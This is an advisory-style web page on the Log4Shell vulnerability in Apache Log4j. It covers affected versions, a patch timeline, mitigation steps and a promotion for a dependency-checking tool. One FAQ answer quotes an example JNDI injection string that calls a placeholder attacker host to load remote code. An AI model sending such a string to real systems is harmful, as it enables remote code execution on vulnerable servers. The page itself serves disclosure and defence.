CVE-2021-44228 — Log4Shell — Apache Log4j CRITICAL
🔴 CISA KEV — Actively Exploited
CVSS Score: 10.0 · CRITICAL Severity
Log4Shell is the most severe Java vulnerability ever discovered. A remote attacker can execute arbitrary code on any system running Log4j 2.x by sending a crafted string that causes Log4j to make a JNDI lookup. No authentication required. Affects virtually every Java application logging with Log4j 2.x — web servers, enterprise applications, cloud services, embedded systems.
Affected Packages
| Ecosystem | Package | Vulnerable | Safe version | Fix |
|---|---|---|---|---|
| Java/Maven | log4j-core | < 2.15.0 (critical), < 2.17.1 (all bypasses) | 2.23.1 | Fix guide → |
| Java/Maven | log4j-api | < 2.15.0 | 2.23.1 | Fix guide → |
Vulnerability Timeline
Dec 9, 2021CVE published. Zero-day already being exploited in the wild.
Dec 10, 2021CISA issues emergency directive for US federal agencies.
Dec 13, 2021Log4j 2.15.0 released — first patch (incomplete for some configs).
Dec 14, 2021CVE-2021-45046 found — 2.15.0 bypass. Log4j 2.16.0 released.
Dec 18, 2021CVE-2021-45105 found — DoS in 2.16.0. Log4j 2.17.0 released.
Dec 28, 2021CVE-2021-44832 found — RCE via JDBC appender. Log4j 2.17.1 released.
2022–2026Still being actively exploited in unpatched systems. CISA KEV confirmed ongoing.
Paste your manifest — get back a fixed version with all CVEs patched in seconds.
Open PackageFix →No signup · No CLI · No GitHub · Runs 100% in your browser
Frequently Asked Questions
What is Log4Shell?
Log4Shell (CVE-2021-44228) is a remote code execution vulnerability in Apache Log4j 2.x. An attacker sends a string like ${jndi:ldap://attacker.com/a} in any logged field — HTTP headers, usernames, search queries. Log4j resolves the JNDI reference and loads attacker-controlled code. No authentication required.
Am I affected by Log4Shell?
Any Java application using Log4j 2.x (2.0-beta9 to 2.14.1) is fully vulnerable. Log4j 2.15.0 is partially patched — upgrade to 2.17.1+ to address all bypasses. Check your pom.xml for log4j-core as a direct or transitive dependency.
What is the fix for Log4Shell?
Upgrade log4j-core to 2.17.1 or later. If upgrading is not immediately possible, set the JVM argument -Dlog4j2.formatMsgNoLookups=true as a temporary mitigation. Do not rely on this mitigation alone — upgrade as soon as possible.
Is Log4Shell still being exploited in 2026?
Yes. CISA KEV confirms ongoing exploitation. Unpatched Log4j installations continue to be targeted by ransomware operators, cryptominers, and nation-state actors. Any system still running vulnerable Log4j is actively being scanned for by automated tools.
How do I check if my Maven project uses Log4j?
Paste your pom.xml into PackageFix. It resolves variable references and checks transitive dependencies — Log4j often comes in as a transitive dependency of other frameworks like Apache Struts, Elasticsearch, or Spring Boot.